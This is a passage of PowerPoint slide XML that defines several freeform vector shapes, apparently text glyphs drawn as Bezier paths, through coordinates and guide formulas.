                    <a:pt x="151" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="218"/>
                    <a:pt x="172" y="218"/>
                    <a:pt x="172" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="188"/>
                    <a:pt x="161" y="188"/>
                    <a:pt x="143" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="143" y="99"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="54"/>
                    <a:pt x="164" y="31"/>
                    <a:pt x="184" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="31"/>
                    <a:pt x="202" y="39"/>
                    <a:pt x="202" y="72"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="202" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="188"/>
                    <a:pt x="180" y="188"/>
                    <a:pt x="180" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="218"/>
                    <a:pt x="194" y="218"/>
                    <a:pt x="201" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="238" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="218"/>
                    <a:pt x="259" y="218"/>
                    <a:pt x="259" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="188"/>
                    <a:pt x="248" y="188"/>
                    <a:pt x="230" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="230" y="67"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="57"/>
                    <a:pt x="230" y="0"/>
                    <a:pt x="186" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="0"/>
                    <a:pt x="151" y="7"/>
                    <a:pt x="137" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="9"/>
                    <a:pt x="115" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="0"/>
                    <a:pt x="68" y="7"/>
                    <a:pt x="56" y="1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5" name="Freeform 146">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD3465F7-7D87-4DE1-BAE5-70F91F8EE6A6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId47"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3421064" y="3065463"/>
              <a:ext cx="98425" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 21 w 232"/>
                <a:gd name="T1" fmla="*/ 0 h 304"/>
                <a:gd name="T2" fmla="*/ 0 w 232"/>
                <a:gd name="T3" fmla="*/ 15 h 304"/>
                <a:gd name="T4" fmla="*/ 21 w 232"/>
                <a:gd name="T5" fmla="*/ 30 h 304"/>
                <a:gd name="T6" fmla="*/ 32 w 232"/>
                <a:gd name="T7" fmla="*/ 30 h 304"/>
                <a:gd name="T8" fmla="*/ 32 w 232"/>
                <a:gd name="T9" fmla="*/ 274 h 304"/>
                <a:gd name="T10" fmla="*/ 21 w 232"/>
                <a:gd name="T11" fmla="*/ 274 h 304"/>
                <a:gd name="T12" fmla="*/ 0 w 232"/>
                <a:gd name="T13" fmla="*/ 289 h 304"/>
                <a:gd name="T14" fmla="*/ 21 w 232"/>
                <a:gd name="T15" fmla="*/ 304 h 304"/>
                <a:gd name="T16" fmla="*/ 123 w 232"/>
                <a:gd name="T17" fmla="*/ 304 h 304"/>
                <a:gd name="T18" fmla="*/ 232 w 232"/>
                <a:gd name="T19" fmla="*/ 154 h 304"/>
                <a:gd name="T20" fmla="*/ 123 w 232"/>
                <a:gd name="T21" fmla="*/ 0 h 304"/>
                <a:gd name="T22" fmla="*/ 21 w 232"/>
                <a:gd name="T23" fmla="*/ 0 h 304"/>
                <a:gd name="T24" fmla="*/ 66 w 232"/>
                <a:gd name="T25" fmla="*/ 274 h 304"/>
                <a:gd name="T26" fmla="*/ 66 w 232"/>
                <a:gd name="T27" fmla="*/ 30 h 304"/>
                <a:gd name="T28" fmla="*/ 114 w 232"/>
                <a:gd name="T29" fmla="*/ 30 h 304"/>
                <a:gd name="T30" fmla="*/ 198 w 232"/>
                <a:gd name="T31" fmla="*/ 154 h 304"/>
                <a:gd name="T32" fmla="*/ 114 w 232"/>
                <a:gd name="T33" fmla="*/ 274 h 304"/>
                <a:gd name="T34" fmla="*/ 66 w 232"/>
                <a:gd name="T35" fmla="*/ 27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304">
                  <a:moveTo>
                    <a:pt x="21" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="21" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="32" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="13" y="304"/>
                    <a:pt x="21" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="123" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="304"/>
                    <a:pt x="232" y="234"/>
                    <a:pt x="232" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="74"/>
                    <a:pt x="190" y="0"/>
                    <a:pt x="123" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="66" y="274"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="66" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="30"/>
                    <a:pt x="198" y="96"/>
                    <a:pt x="198" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="213"/>
                    <a:pt x="169" y="274"/>
                    <a:pt x="114" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="66" y="27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6" name="Freeform 147">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30625E74-64D1-4234-8A95-F192A39B5D86}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId48"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3540126" y="3101975"/>
              <a:ext cx="85725" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 204 w 204"/>
                <a:gd name="T1" fmla="*/ 112 h 222"/>
                <a:gd name="T2" fmla="*/ 102 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 222"/>
                <a:gd name="T4" fmla="*/ 0 w 204"/>
                <a:gd name="T5" fmla="*/ 112 h 222"/>
                <a:gd name="T6" fmla="*/ 102 w 204"/>
                <a:gd name="T7" fmla="*/ 222 h 222"/>
                <a:gd name="T8" fmla="*/ 204 w 204"/>
                <a:gd name="T9" fmla="*/ 112 h 222"/>
                <a:gd name="T10" fmla="*/ 102 w 204"/>
                <a:gd name="T11" fmla="*/ 192 h 222"/>
                <a:gd name="T12" fmla="*/ 34 w 204"/>
                <a:gd name="T13" fmla="*/ 108 h 222"/>
                <a:gd name="T14" fmla="*/ 102 w 204"/>
                <a:gd name="T15" fmla="*/ 30 h 222"/>
                <a:gd name="T16" fmla="*/ 170 w 204"/>
                <a:gd name="T17" fmla="*/ 108 h 222"/>
                <a:gd name="T18" fmla="*/ 102 w 204"/>
                <a:gd name="T19" fmla="*/ 1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22">
                  <a:moveTo>
                    <a:pt x="204" y="112"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="158" y="0"/>
                    <a:pt x="102" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="0"/>
                    <a:pt x="0" y="49"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="175"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="102" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="222"/>
                    <a:pt x="204" y="174"/>
                    <a:pt x="204" y="112"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="102" y="192"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="192"/>
                    <a:pt x="34" y="154"/>
                    <a:pt x="34" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="63"/>
                    <a:pt x="66" y="30"/>
                    <a:pt x="102" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="30"/>
                    <a:pt x="170" y="63"/>
                    <a:pt x="170" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="154"/>
                    <a:pt x="139" y="192"/>
                    <a:pt x="102"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7" name="Freeform 148">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB8A67C0-154F-46BA-97B3-911816C7242F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId49"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3654426" y="3101975"/>
              <a:ext cx="82550" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 196"/>
                <a:gd name="T1" fmla="*/ 165 h 222"/>
                <a:gd name="T2" fmla="*/ 179 w 196"/>
                <a:gd name="T3" fmla="*/ 151 h 222"/>
                <a:gd name="T4" fmla="*/ 162 w 196"/>
                <a:gd name="T5" fmla="*/ 162 h 222"/>
                <a:gd name="T6" fmla="*/ 113 w 196"/>
                <a:gd name="T7" fmla="*/ 192 h 222"/>
                <a:gd name="T8" fmla="*/ 35 w 196"/>
                <a:gd name="T9" fmla="*/ 112 h 222"/>
                <a:gd name="T10" fmla="*/ 116 w 196"/>
                <a:gd name="T11" fmla="*/ 30 h 222"/>
                <a:gd name="T12" fmla="*/ 146 w 196"/>
                <a:gd name="T13" fmla="*/ 35 h 222"/>
                <a:gd name="T14" fmla="*/ 168 w 196"/>
                <a:gd name="T15" fmla="*/ 59 h 222"/>
                <a:gd name="T16" fmla="*/ 190 w 196"/>
                <a:gd name="T17" fmla="*/ 36 h 222"/>
                <a:gd name="T18" fmla="*/ 116 w 196"/>
                <a:gd name="T19" fmla="*/ 0 h 222"/>
                <a:gd name="T20" fmla="*/ 0 w 196"/>
                <a:gd name="T21" fmla="*/ 112 h 222"/>
                <a:gd name="T22" fmla="*/ 110 w 196"/>
                <a:gd name="T23" fmla="*/ 222 h 222"/>
                <a:gd name="T24" fmla="*/ 196 w 196"/>
                <a:gd name="T25"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22">
                  <a:moveTo>
                    <a:pt x="196" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="151"/>
                    <a:pt x="182" y="151"/>
                    <a:pt x="179" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="151"/>
                    <a:pt x="166" y="152"/>
                    <a:pt x="162" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="168"/>
                    <a:pt x="150" y="192"/>
                    <a:pt x="113" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="192"/>
                    <a:pt x="35" y="157"/>
                    <a:pt x="35" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="88"/>
                    <a:pt x="48" y="30"/>
                    <a:pt x="116" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="30"/>
                    <a:pt x="146" y="30"/>
                    <a:pt x="146" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="52"/>
                    <a:pt x="156" y="59"/>
                    <a:pt x="168" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="59"/>
                    <a:pt x="190" y="51"/>
                    <a:pt x="190" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="116" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="0" y="68"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="171"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="110" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="222"/>
                    <a:pt x="196" y="173"/>
                    <a:pt x="196"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8" name="Freeform 149">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E39D4F2E-6690-46BB-9C6B-2246F5ADB1A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId50"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3751264" y="3103563"/>
              <a:ext cx="106363" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 173 w 250"/>
                <a:gd name="T1" fmla="*/ 199 h 218"/>
                <a:gd name="T2" fmla="*/ 193 w 250"/>
                <a:gd name="T3" fmla="*/ 215 h 218"/>
                <a:gd name="T4" fmla="*/ 229 w 250"/>
                <a:gd name="T5" fmla="*/ 215 h 218"/>
                <a:gd name="T6" fmla="*/ 250 w 250"/>
                <a:gd name="T7" fmla="*/ 200 h 218"/>
                <a:gd name="T8" fmla="*/ 230 w 250"/>
                <a:gd name="T9" fmla="*/ 185 h 218"/>
                <a:gd name="T10" fmla="*/ 207 w 250"/>
                <a:gd name="T11" fmla="*/ 185 h 218"/>
                <a:gd name="T12" fmla="*/ 207 w 250"/>
                <a:gd name="T13" fmla="*/ 21 h 218"/>
                <a:gd name="T14" fmla="*/ 187 w 250"/>
                <a:gd name="T15" fmla="*/ 0 h 218"/>
                <a:gd name="T16" fmla="*/ 151 w 250"/>
                <a:gd name="T17" fmla="*/ 0 h 218"/>
                <a:gd name="T18" fmla="*/ 130 w 250"/>
                <a:gd name="T19" fmla="*/ 16 h 218"/>
                <a:gd name="T20" fmla="*/ 150 w 250"/>
                <a:gd name="T21" fmla="*/ 31 h 218"/>
                <a:gd name="T22" fmla="*/ 173 w 250"/>
                <a:gd name="T23" fmla="*/ 31 h 218"/>
                <a:gd name="T24" fmla="*/ 173 w 250"/>
                <a:gd name="T25" fmla="*/ 137 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 250"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 250"/>
                <a:gd name="T29" fmla="*/ 155 h 218"/>
                <a:gd name="T30" fmla="*/ 77 w 250"/>
                <a:gd name="T31" fmla="*/ 21 h 218"/>
                <a:gd name="T32" fmla="*/ 57 w 250"/>
                <a:gd name="T33" fmla="*/ 0 h 218"/>
                <a:gd name="T34" fmla="*/ 21 w 250"/>
                <a:gd name="T35" fmla="*/ 0 h 218"/>
                <a:gd name="T36" fmla="*/ 0 w 250"/>
                <a:gd name="T37" fmla="*/ 16 h 218"/>
                <a:gd name="T38" fmla="*/ 20 w 250"/>
                <a:gd name="T39" fmla="*/ 31 h 218"/>
                <a:gd name="T40" fmla="*/ 43 w 250"/>
                <a:gd name="T41" fmla="*/ 31 h 218"/>
                <a:gd name="T42" fmla="*/ 43 w 250"/>
                <a:gd name="T43" fmla="*/ 158 h 218"/>
                <a:gd name="T44" fmla="*/ 113 w 250"/>
                <a:gd name="T45" fmla="*/ 218 h 218"/>
                <a:gd name="T46" fmla="*/ 173 w 250"/>
                <a:gd name="T47" fmla="*/ 19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0" h="218">
                  <a:moveTo>
                    <a:pt x="173" y="199"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="215"/>
                    <a:pt x="184" y="215"/>
                    <a:pt x="193" y="215"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="229" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="215"/>
                    <a:pt x="250" y="215"/>
                    <a:pt x="250" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="185"/>
                    <a:pt x="237" y="185"/>
                    <a:pt x="230" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="5"/>
                    <a:pt x="204" y="0"/>
                    <a:pt x="187" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="151" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="0"/>
                    <a:pt x="130" y="0"/>
                    <a:pt x="130" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="31"/>
                    <a:pt x="143" y="31"/>
                    <a:pt x="150" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="137"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="182"/>
                    <a:pt x="132" y="188"/>
                    <a:pt x="116" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="188"/>
                    <a:pt x="77" y="171"/>
                    <a:pt x="77" y="155"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="5"/>
                    <a:pt x="74" y="0"/>
                    <a:pt x="57" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="13" y="31"/>
                    <a:pt x="20" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="43" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="158"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="206"/>
                    <a:pt x="77" y="218"/>
                    <a:pt x="113" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="218"/>
                    <a:pt x="154" y="213"/>
                    <a:pt x="173" y="19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9" name="Freeform 150">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC85D48E-90E9-424D-B5FD-085A812F894F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId51"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3859214" y="3103563"/>
              <a:ext cx="109538" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 56 w 259"/>
                <a:gd name="T1" fmla="*/ 18 h 218"/>
                <a:gd name="T2" fmla="*/ 36 w 259"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 20 w 259"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 259"/>
                <a:gd name="T7" fmla="*/ 18 h 218"/>
                <a:gd name="T8" fmla="*/ 28 w 259"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 28 w 259"/>
                <a:gd name="T11" fmla="*/ 188 h 218"/>
                <a:gd name="T12" fmla="*/ 0 w 259"/>
                <a:gd name="T13" fmla="*/ 203 h 218"/>
                <a:gd name="T14" fmla="*/ 20 w 259"/>
                <a:gd name="T15" fmla="*/ 218 h 218"/>
                <a:gd name="T16" fmla="*/ 64 w 259"/>
                <a:gd name="T17" fmla="*/ 218 h 218"/>
                <a:gd name="T18" fmla="*/ 85 w 259"/>
                <a:gd name="T19" fmla="*/ 203 h 218"/>
                <a:gd name="T20" fmla="*/ 56 w 259"/>
                <a:gd name="T21" fmla="*/ 188 h 218"/>
                <a:gd name="T22" fmla="*/ 56 w 259"/>
                <a:gd name="T23" fmla="*/ 99 h 218"/>
                <a:gd name="T24" fmla="*/ 97 w 259"/>
                <a:gd name="T25" fmla="*/ 31 h 218"/>
                <a:gd name="T26" fmla="*/ 115 w 259"/>
                <a:gd name="T27" fmla="*/ 72 h 218"/>
                <a:gd name="T28" fmla="*/ 115 w 259"/>
                <a:gd name="T29" fmla="*/ 188 h 218"/>
                <a:gd name="T30" fmla="*/ 93 w 259"/>
                <a:gd name="T31" fmla="*/ 203 h 218"/>
                <a:gd name="T32" fmla="*/ 114 w 259"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 151 w 259"/>
                <a:gd name="T35" fmla="*/ 218 h 218"/>
                <a:gd name="T36" fmla="*/ 172 w 259"/>
                <a:gd name="T37" fmla="*/ 203 h 218"/>
                <a:gd name="T38" fmla="*/ 143 w 259"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 143 w 259"/>
                <a:gd name="T41" fmla="*/ 99 h 218"/>
                <a:gd name="T42" fmla="*/ 184 w 259"/>
                <a:gd name="T43" fmla="*/ 31 h 218"/>
                <a:gd name="T44" fmla="*/ 203 w 259"/>
                <a:gd name="T45" fmla="*/ 72 h 218"/>
                <a:gd name="T46" fmla="*/ 203 w 259"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 181 w 259"/>
                <a:gd name="T49" fmla="*/ 203 h 218"/>
                <a:gd name="T50" fmla="*/ 201 w 259"/>
                <a:gd name="T51" fmla="*/ 218 h 218"/>
                <a:gd name="T52" fmla="*/ 239 w 259"/>
                <a:gd name="T53" fmla="*/ 218 h 218"/>
                <a:gd name="T54" fmla="*/ 259 w 259"/>
                <a:gd name="T55" fmla="*/ 203 h 218"/>
                <a:gd name="T56" fmla="*/ 231 w 259"/>
                <a:gd name="T57" fmla="*/ 188 h 218"/>
                <a:gd name="T58" fmla="*/ 231 w 259"/>
                <a:gd name="T59" fmla="*/ 67 h 218"/>
                <a:gd name="T60" fmla="*/ 186 w 259"/>
                <a:gd name="T61" fmla="*/ 0 h 218"/>
                <a:gd name="T62" fmla="*/ 137 w 259"/>
                <a:gd name="T63" fmla="*/ 26 h 218"/>
                <a:gd name="T64" fmla="*/ 99 w 259"/>
                <a:gd name="T65" fmla="*/ 0 h 218"/>
                <a:gd name="T66" fmla="*/ 56 w 259"/>
                <a:gd name="T67"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9" h="218">
                  <a:moveTo>
                    <a:pt x="56" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="3"/>
                    <a:pt x="45" y="3"/>
                    <a:pt x="36" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="10" y="34"/>
                    <a:pt x="28" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="13" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="218"/>
                    <a:pt x="85" y="218"/>
                    <a:pt x="85" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="188"/>
                    <a:pt x="74" y="188"/>
                    <a:pt x="56" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="56" y="99"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="54"/>
                    <a:pt x="77" y="31"/>
                    <a:pt x="97" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="31"/>
                    <a:pt x="115" y="39"/>
                    <a:pt x="115" y="72"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="188"/>
                    <a:pt x="93" y="188"/>
                    <a:pt x="93" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="218"/>
                    <a:pt x="107" y="218"/>
                    <a:pt x="114" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="151" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="218"/>
                    <a:pt x="172" y="218"/>
                    <a:pt x="172" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="188"/>
                    <a:pt x="161" y="188"/>
                    <a:pt x="143" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="143" y="99"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="54"/>
                    <a:pt x="164" y="31"/>
                    <a:pt x="184" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="31"/>
                    <a:pt x="203" y="39"/>
                    <a:pt x="203" y="72"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="203" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="188"/>
                    <a:pt x="181" y="188"/>
                    <a:pt x="181" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="218"/>
                    <a:pt x="194" y="218"/>
                    <a:pt x="201" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="239" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="218"/>
                    <a:pt x="259" y="218"/>
                    <a:pt x="259" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="188"/>
                    <a:pt x="249" y="188"/>
                    <a:pt x="231" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="231" y="67"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="57"/>
                    <a:pt x="231" y="0"/>
                    <a:pt x="186" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="0"/>
                    <a:pt x="151" y="7"/>
